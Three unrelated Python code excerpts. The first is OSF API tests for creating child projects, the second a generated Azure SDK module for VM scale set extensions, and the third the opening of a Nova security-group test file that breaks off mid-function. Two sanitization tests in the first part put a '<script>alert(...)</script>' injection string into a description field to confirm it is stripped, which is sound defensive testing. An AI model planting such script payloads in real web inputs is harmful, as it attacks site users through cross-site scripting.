assert res.json['errors'][0]['detail'] == 'This field may not be null.'
assert res.json['errors'][0]['source']['pointer'] == '/data/type'
# test_creates_child_incorrect_type
child = {
'data': {
'type': 'Wrong type.',
'attributes': {
'title': 'child',
'description': 'this is a child project',
'category': 'project',
}
}
}
res = app.post_json_api(url, child, auth=user.auth, expect_errors=True)
assert res.status_code == 409
assert res.json['errors'][0]['detail'] == 'This resource has a type of "nodes", but you set the json body\'s type field to "Wrong type.". You probably need to change the type field to match the resource\'s type.'
# test_creates_child_properties_not_nested
child = {
'data': {
'title': 'child',
'description': 'this is a child project',
'category': 'project',
}
}
res = app.post_json_api(url, child, auth=user.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Request must include /data/attributes.'
assert res.json['errors'][0]['source']['pointer'] == '/data/attributes'
def test_creates_child_logged_in_write_contributor(
self, app, user, project, child, url):
write_contrib = AuthUserFactory()
project.add_contributor(
write_contrib,
permissions=[
permissions.READ,
permissions.WRITE],
auth=Auth(user),
save=True)
res = app.post_json_api(url, child, auth=write_contrib.auth)
assert res.status_code == 201
assert res.json['data']['attributes']['title'] == child['data']['attributes']['title']
assert res.json['data']['attributes']['description'] == child['data']['attributes']['description']
assert res.json['data']['attributes']['category'] == child['data']['attributes']['category']
project.reload()
child_id = res.json['data']['id']
assert child_id == project.nodes[0]._id
assert AbstractNode.load(child_id).logs.latest(
).action == NodeLog.PROJECT_CREATED
def test_creates_child_logged_in_owner(
self, app, user, project, child, url):
res = app.post_json_api(url, child, auth=user.auth)
assert res.status_code == 201
assert res.json['data']['attributes']['title'] == child['data']['attributes']['title']
assert res.json['data']['attributes']['description'] == child['data']['attributes']['description']
assert res.json['data']['attributes']['category'] == child['data']['attributes']['category']
project.reload()
assert res.json['data']['id'] == project.nodes[0]._id
assert project.nodes[0].logs.latest().action == NodeLog.PROJECT_CREATED
def test_creates_child_creates_child_and_sanitizes_html_logged_in_owner(
self, app, user, project, url):
title = '<em>Reasonable</em> <strong>Project</strong>'
description = 'An <script>alert("even reasonabler")</script> child'
res = app.post_json_api(url, {
'data': {
'type': 'nodes',
'attributes': {
'title': title,
'description': description,
'category': 'project',
'public': True
}
}
}, auth=user.auth)
child_id = res.json['data']['id']
assert res.status_code == 201
url = '/{}nodes/{}/'.format(API_BASE, child_id)
res = app.get(url, auth=user.auth)
assert res.json['data']['attributes']['title'] == strip_html(title)
assert res.json['data']['attributes']['description'] == strip_html(
description)
assert res.json['data']['attributes']['category'] == 'project'
project.reload()
child_id = res.json['data']['id']
assert child_id == project.nodes[0]._id
assert AbstractNode.load(child_id).logs.latest(
).action == NodeLog.PROJECT_CREATED
def test_cannot_create_child_on_a_registration(self, app, user, project):
registration = RegistrationFactory(project=project, creator=user)
url = '/{}nodes/{}/children/'.format(API_BASE, registration._id)
res = app.post_json_api(url, {
'data': {
'type': 'nodes',
'attributes': {
'title': fake.catch_phrase(),
'description': fake.bs(),
'category': 'project',
'public': True,
}
}
}, auth=user.auth, expect_errors=True)
assert res.status_code == 404
@pytest.mark.django_db
class TestNodeChildrenBulkCreate:
@pytest.fixture()
def project(self, user):
return ProjectFactory(creator=user, is_public=True)
@pytest.fixture()
def url(self, project):
return '/{}nodes/{}/children/'.format(API_BASE, project._id)
@pytest.fixture()
def child_one(self):
return {
'type': 'nodes',
'attributes': {
'title': 'child',
'description': 'this is a child project',
'category': 'project'
}
}
@pytest.fixture()
def child_two(self):
return {
'type': 'nodes',
'attributes': {
'title': 'second child',
'description': 'this is my hypothesis',
'category': 'hypothesis'
}
}
def test_bulk_children_create_blank_request(self, app, user, url):
res = app.post_json_api(
url, auth=user.auth,
expect_errors=True, bulk=True)
assert res.status_code == 400
def test_bulk_creates_children_limits(self, app, user, child_one, url):
res = app.post_json_api(
url, {'data': [child_one] * 101},
auth=user.auth, expect_errors=True, bulk=True
)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Bulk operation limit is 100, got 101.'
assert res.json['errors'][0]['source']['pointer'] == '/data'
def test_bulk_creates_children_auth_errors(
self, app, user, project, child_one, child_two, url):
# test_bulk_creates_children_logged_out_user
res = app.post_json_api(
url,
{'data': [child_one, child_two]},
expect_errors=True, bulk=True
)
assert res.status_code == 401
project.reload()
assert len(project.nodes) == 0
# test_bulk_creates_children_logged_in_read_contributor
read_contrib = AuthUserFactory()
project.add_contributor(
read_contrib,
permissions=[permissions.READ],
auth=Auth(user),
save=True)
res = app.post_json_api(
url,
{'data': [child_one, child_two]},
auth=read_contrib.auth,
expect_errors=True, bulk=True)
assert res.status_code == 403
project.reload()
assert len(project.nodes) == 0
# test_bulk_creates_children_logged_in_non_contributor
non_contrib = AuthUserFactory()
res = app.post_json_api(
url,
{'data': [child_one, child_two]},
auth=non_contrib.auth,
expect_errors=True, bulk=True)
assert res.status_code == 403
project.reload()
assert len(project.nodes) == 0
def test_bulk_creates_children_logged_in_owner(
self, app, user, project, child_one, child_two, url):
res = app.post_json_api(
url,
{'data': [child_one, child_two]},
auth=user.auth, bulk=True)
assert res.status_code == 201
assert res.json['data'][0]['attributes']['title'] == child_one['attributes']['title']
assert res.json['data'][0]['attributes']['description'] == child_one['attributes']['description']
assert res.json['data'][0]['attributes']['category'] == child_one['attributes']['category']
assert res.json['data'][1]['attributes']['title'] == child_two['attributes']['title']
assert res.json['data'][1]['attributes']['description'] == child_two['attributes']['description']
assert res.json['data'][1]['attributes']['category'] == child_two['attributes']['category']
project.reload()
nodes = project.nodes
assert res.json['data'][0]['id'] == nodes[0]._id
assert res.json['data'][1]['id'] == nodes[1]._id
assert nodes[0].logs.latest().action == NodeLog.PROJECT_CREATED
assert nodes[1].logs.latest().action == NodeLog.PROJECT_CREATED
def test_bulk_creates_children_child_logged_in_write_contributor(
self, app, user, project, child_one, child_two, url):
write_contrib = AuthUserFactory()
project.add_contributor(
write_contrib,
permissions=[
permissions.READ,
permissions.WRITE],
auth=Auth(user),
save=True)
res = app.post_json_api(
url,
{'data': [child_one, child_two]},
auth=write_contrib.auth, bulk=True)
assert res.status_code == 201
assert res.json['data'][0]['attributes']['title'] == child_one['attributes']['title']
assert res.json['data'][0]['attributes']['description'] == child_one['attributes']['description']
assert res.json['data'][0]['attributes']['category'] == child_one['attributes']['category']
assert res.json['data'][1]['attributes']['title'] == child_two['attributes']['title']
assert res.json['data'][1]['attributes']['description'] == child_two['attributes']['description']
assert res.json['data'][1]['attributes']['category'] == child_two['attributes']['category']
project.reload()
child_id = res.json['data'][0]['id']
child_two_id = res.json['data'][1]['id']
nodes = project.nodes
assert child_id == nodes[0]._id
assert child_two_id == nodes[1]._id
assert AbstractNode.load(child_id).logs.latest(
).action == NodeLog.PROJECT_CREATED
assert nodes[1].logs.latest().action == NodeLog.PROJECT_CREATED
def test_bulk_creates_children_and_sanitizes_html_logged_in_owner(
self, app, user, project, url):
title = '<em>Reasoning</em> <strong>Aboot Projects</strong>'
description = 'A <script>alert("super reasonable")</script> child'
res = app.post_json_api(url, {
'data': [{
'type': 'nodes',
'attributes': {
'title': title,
'description': description,
'category': 'project',
'public': True
}
}]
}, auth=user.auth, bulk=True)
child_id = res.json['data'][0]['id']
assert res.status_code == 201
url = '/{}nodes/{}/'.format(API_BASE, child_id)
res = app.get(url, auth=user.auth)
assert res.json['data']['attributes']['title'] == strip_html(title)
assert res.json['data']['attributes']['description'] == strip_html(
description)
assert res.json['data']['attributes']['category'] == 'project'
project.reload()
child_id = res.json['data']['id']
assert child_id == project.nodes[0]._id
assert AbstractNode.load(child_id).logs.latest(
).action == NodeLog.PROJECT_CREATED
def test_cannot_bulk_create_children_on_a_registration(
self, app, user, project, child_two):
registration = RegistrationFactory(project=project, creator=user)
url = '/{}nodes/{}/children/'.format(API_BASE, registration._id)
res = app.post_json_api(url, {
'data': [child_two, {
'type': 'nodes',
'attributes': {
'title': fake.catch_phrase(),
'description': fake.bs(),
'category': 'project',
'public': True,
}
}]
}, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 404
project.reload()
assert len(project.nodes) == 0
def test_bulk_creates_children_payload_errors(
self, app, user, project, child_two, url):
# def test_bulk_creates_children_no_type(self, app, user, project,
# child_two, url):
child = {
'data': [child_two, {
'attributes': {
'title': 'child',
'description': 'this is a child project',
'category': 'project',
}
}]
}
res = app.post_json_api(
url, child, auth=user.auth,
expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'This field may not be null.'
assert res.json['errors'][0]['source']['pointer'] == '/data/1/type'
project.reload()
assert len(project.nodes) == 0
# def test_bulk_creates_children_incorrect_type(self, app, user, project,
# child_two, url):
child = {
'data': [child_two, {
'type': 'Wrong type.',
'attributes': {
'title': 'child',
'description': 'this is a child project',
'category': 'project',
}
}]
}
res = app.post_json_api(
url, child, auth=user.auth,
expect_errors=True, bulk=True)
assert res.status_code == 409
assert res.json['errors'][0]['detail'] == 'This resource has a type of "nodes", but you set the json body\'s type field to "Wrong type.". You probably need to change the type field to match the resource\'s type.'
project.reload()
assert len(project.nodes) == 0
# def test_bulk_creates_children_properties_not_nested(self, app, user,
# project, child_two, url):
child = {
'data': [child_two, {
'title': 'child',
'description': 'this is a child project',
'category': 'project',
}]
}
res = app.post_json_api(
url, child, auth=user.auth,
expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Request must include /data/attributes.'
assert res.json['errors'][0]['source']['pointer'] == '/data/attributes'
project.reload()
assert len(project.nodes) == 0
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_create_or_update_request_initial(
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2018-04-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"vmScaleSetName": _SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
"vmssExtensionName": _SERIALIZER.url("vmss_extension_name", vmss_extension_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2018-04-01"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"vmScaleSetName": _SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
"vmssExtensionName": _SERIALIZER.url("vmss_extension_name", vmss_extension_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_get_request(
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
subscription_id: str,
*,
expand: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
api_version = "2018-04-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"vmScaleSetName": _SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
"vmssExtensionName": _SERIALIZER.url("vmss_extension_name", vmss_extension_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = _SERIALIZER.query("expand", expand, 'str')
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_request(
resource_group_name: str,
vm_scale_set_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2018-04-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"vmScaleSetName": _SERIALIZER.url("vm_scale_set_name", vm_scale_set_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class VirtualMachineScaleSetExtensionsOperations(object):
"""VirtualMachineScaleSetExtensionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2018_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _create_or_update_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
extension_parameters: "_models.VirtualMachineScaleSetExtension",
**kwargs: Any
) -> "_models.VirtualMachineScaleSetExtension":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtension"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(extension_parameters, 'VirtualMachineScaleSetExtension')
request = build_create_or_update_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
extension_parameters: "_models.VirtualMachineScaleSetExtension",
**kwargs: Any
) -> LROPoller["_models.VirtualMachineScaleSetExtension"]:
"""The operation to create or update an extension.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set where the extension should be create or
updated.
:type vm_scale_set_name: str
:param vmss_extension_name: The name of the VM scale set extension.
:type vmss_extension_name: str
:param extension_parameters: Parameters supplied to the Create VM scale set Extension
operation.
:type extension_parameters:
~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtension
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualMachineScaleSetExtension or the
result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtension]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtension"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
extension_parameters=extension_parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
def _delete_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
subscription_id=self._config.subscription_id,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def begin_delete(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
**kwargs: Any
) -> LROPoller[None]:
"""The operation to delete the extension.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set where the extension should be deleted.
:type vm_scale_set_name: str
:param vmss_extension_name: The name of the VM scale set extension.
:type vmss_extension_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
vm_scale_set_name: str,
vmss_extension_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetExtension":
"""The operation to get the extension.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set containing the extension.
:type vm_scale_set_name: str
:param vmss_extension_name: The name of the VM scale set extension.
:type vmss_extension_name: str
:param expand: The expand expression to apply on the operation.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetExtension, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtension
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtension"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
vmss_extension_name=vmss_extension_name,
subscription_id=self._config.subscription_id,
expand=expand,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetExtension', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions/{vmssExtensionName}'} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
vm_scale_set_name: str,
**kwargs: Any
) -> Iterable["_models.VirtualMachineScaleSetExtensionListResult"]:
"""Gets a list of all extensions in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set containing the extension.
:type vm_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineScaleSetExtensionListResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2018_04_01.models.VirtualMachineScaleSetExtensionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetExtensionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("VirtualMachineScaleSetExtensionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/extensions'} # type: ignore
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# Copyright 2012 Justin Santa Barbara
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import mox
from oslo.config import cfg
import webob
from nova.api.openstack.compute.contrib import security_groups
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
import nova.db
from nova import exception
from nova.openstack.common import jsonutils
from nova import quota
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import utils
CONF = cfg.CONF
FAKE_UUID1 = 'a47ae74e-ab08-447f-8eee-ffd43fc46c16'
FAKE_UUID2 = 'c6e6430a-6563-4efa-9542-5e93c9e97d18'
class AttrDict(dict):
def __getattr__(self, k):
return self[k]
def security_group_template(**kwargs):
sg = kwargs.copy()
sg.setdefault('tenant_id', '123')
sg.setdefault('name', 'test')
sg.setdefault('description', 'test-description')
return sg
def security_group_db(security_group, id=None):
attrs = security_group.copy()
if 'tenant_id' in attrs:
attrs['project_id'] = attrs.pop('tenant_id')
if id is not None:
attrs['id'] = id
attrs.setdefault('rules', [])
attrs.setdefault('instances', [])
return AttrDict(attrs)
def security_group_rule_template(**kwargs):
rule = kwargs.copy()
rule.setdefault('ip_protocol', 'tcp')
rule.setdefault('from_port', 22)
rule.setdefault('to_port', 22)
rule.setdefault('parent_group_id', 2)
return rule
def security_group_rule_db(rule, id=None):
attrs = rule.copy()
if 'ip_protocol' in attrs:
attrs['protocol'] = attrs.pop('ip_protocol')
return AttrDict(attrs)
def return_server(context, server_id):
return {'id': int(server_id),
'power_state': 0x01,
'host': "localhost",
'uuid': FAKE_UUID1,
'name': 'asdf'}
def return_server_by_uuid(context, server_uuid):
return {'id': 1,
'power_state': 0x01,
'host': "localhost",
'uuid': server_uuid,
'name': 'asdf'}
def return_non_running_server(context, server_id):
return {'id': server_id, 'power_state': 0x02, 'uuid': FAKE_UUID1,
'host': "localhost", 'name': 'asdf'}
def return_security_group_by_name(context, project_id, group_name):
return {'id': 1, 'name': group_name,
"instances": [{'id': 1, 'uuid': FAKE_UUID1}]}
def return_security_group_without_instances(context, project_id, group_name):
return {'id': 1, 'name': group_name}
def return_server_nonexistent(context, server_id):
